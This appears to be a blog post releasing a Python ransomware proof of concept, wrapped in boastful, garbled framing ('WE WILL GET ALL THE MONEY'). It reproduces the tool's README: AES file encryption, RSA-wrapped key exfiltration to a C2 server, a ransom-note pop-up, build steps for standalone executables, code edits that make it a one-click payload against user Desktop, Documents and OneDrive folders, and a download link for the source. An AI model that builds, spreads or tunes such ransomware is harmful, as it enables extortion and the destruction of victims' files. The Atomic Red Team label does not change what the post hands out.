Written by July 20, 2025

[ 0day (xc) Our ] Randsomeware PHD THESIS SOURCE CODE IN PYTHON , CODE BY SKRAITO WITH LORD JESUS CHRIST … . YEAH WE WILL GET ALL THE MONEY , WE WILL GET ALL THE MONEY … . [ 0day (xc) Our ] is l33t h4x0r 31337 … .

0day . Exploit-0day . PHD THESIS . Project . Public-Release-Code . Security Tutorial Article

[ 0day (xc) Our ] Randsomware v2

A simple python ransomware PoC that can be used for Atomic Red Team: ATT&CK Technique: Data Encrypted for Impact (T1486). The updated code demonstrates a typical ransomware flow and it is just one of many ways to perform ransomware encryption.

TLDR:

  1. Generates AES key to encrypt local file (hardcoded in PoC).
  2. The attacker’s embedded RSA public key (intentionally hardcoded in PoC) is used to encrypt the AES key. The private key is already stored in the attacker’s C2 server. The encrypted text is sent to the C2 server and displayed for the victim.
  3. Ransom note is shown. When the ransom is paid, a decryptor is provided.

Warning: Be extra careful of running the program as it will modify files. Ensure the path is correct and be wary in running with administrative privileges.

Supported

  • python3 (python2 for Linux/macOS should work)
  • Windows, Linux and macOS

Versions

There are two versions:

Version 1: main.py

  • Basic version – Terminal Only

Version 2: main_v2.py

  • Advanced version
  • Ransom note pop up
  • Exfiltrate key back to C2 given domain and port

How to run

Install dependencies:

pip3 install pycryptodome

Default:

Encrypt: python3 main.py -e or python3 main_v2.py -e
Decrypt: python3 main.py -d or python3 main_v2.py -e

Windows with specific path:

Encrypt: python3 main_v2.py -p "C:\users\jimmy\desktop\test_ransomware" -e
Decrypt: python3 main_v2.py -p "C:\users\jimmy\desktop\test_ransomware" -d

Linux/macOS with specific path:

Encrypt: python3 main_v2.py -p "/home/jimmy/test_ransomware" -e
Decrypt: python3 main_v2.py -p "/home/jimmy/test_ransomware" -d

Variables to change:

  • Ransomware Extension [default: .wasted for WastedLocker]
  • AES Key
  • RSA Public key
  • RSA Private key (to be removed). Only used for decryptor.
  • Domain and port for exfiltration (main_v2)

NB: As this is simply a PoC for Atomic Red Team, there is no real need to change the keys or other variables.

Standalone Executable

Tested with python 2.7 with pyinstaller 3.6 and python 3.7 with pyinstaller 4.0. Please note that python 3.8 with pyinstaller 4.0 have known issues as this was incompatible with macOS.

Windows and Linux:

pip3 install pyinstaller
pyinstaller --onefile main_v2.py or py -m PyInstaller --onefile main_v2.py

macOS:

(python 3.7)
python3 -m pip install pyinstaller
pyinstaller --onefile main_v2.py

(python 2.7)
pip install -I pyinstaller==3.6
python -m PyInstaller --onefile main_v2.py

See /bin folder for binaries.

Windows with specific path:

Encrypt: main_v2.exe -p "C:\users\jimmy\desktop\test_ransomware" -e
Decrypt: main_v2.exe -p "C:\users\jimmy\desktop\test_ransomware" -d

Linux with specific path:

Encrypt: ./main_v2 -p "/home/jimmy/test_ransomware" -e
Decrypt: ./main_v2 -p "/home/jimmy/test_ransomware" -d

macOS with specific path:

Encrypt: ./main_v2_macos_py2 -p "/Users/jimmy/test_ransomware" -e
Decrypt: ./main_v2_macos_py2 -p "/Users/jimmy/test_ransomware" -d

Miscellaneous

One-click execution

I originally added arguments to prevent accidental clicks and mess up. To simulate a one-click malware, comment and uncomment the following:

Comment

if len(sys.argv) <= 1:
    print('[*] Ransomware - PoC\n')
    # banner()        
    print('Usage: python3 main.py -h')
    print('{} -h for help.'.format(sys.argv[0]))
    exit(0)

# Parse arguments
args = parse_args()
encrypt = args.encrypt
decrypt = args.decrypt

absolute_path = str(args.path)

Uncomment

absolute_path = "None"
encrypt = True 
decrypt = False

Multiple folders

There is support for multiple paths, add them as such:

startdirs = [os.environ['USERPROFILE'] + '\\Desktop', 
                        os.environ['USERPROFILE'] + '\\Documents',
                        os.environ['USERPROFILE'] + '\\Music',
                        os.environ['USERPROFILE'] + '\\Desktop',
                        os.environ['USERPROFILE'] + '\\Onedrive']

Additional Features

  • Added RSA asymmetric encryption of the AES key.
  • Added autodetection on Windows, Linux or macOS.
  • Added path argument to specify a directory.
  • Fixed handling of renaming files with adding/removing of the ransomware extension.
  • Added ransomware note pop up.
  • Added exfiltration of key back to C2.

DOWNLOAD SOURCE CODE FROM :

https://drive.google.com/drive/folders/1tvQc_AeMb4sJUytcf-PF1wpLircD4mpm?usp=sharing

You may also like

[ 0day (xc) Our ] AstaraOS Fedora 2025 Server Stable , code by skraito ( God Husband ) and skraitow ( Lord Jesus Christ ) … . Release to Public … . We release for … . License Apply … .

[ 0day (xc) Our ] AstaraOS Fedora 2025 Stable x64 and ARM64 BIT CODE by skraito ( l33t h4x0r 31337 ) and Lord Jesus Christ is release to Public … . We release for … . License Apply … .

[ 0day (xc) Our ] News : Libera.Chat IRC Server is Open for public … . We release for … . License Apply … . Code by skraito ( God Husband ) with skraitow ( Lord Jesus Christ ) … .

Leave a Reply

Your email address will not be published. Required fields are marked *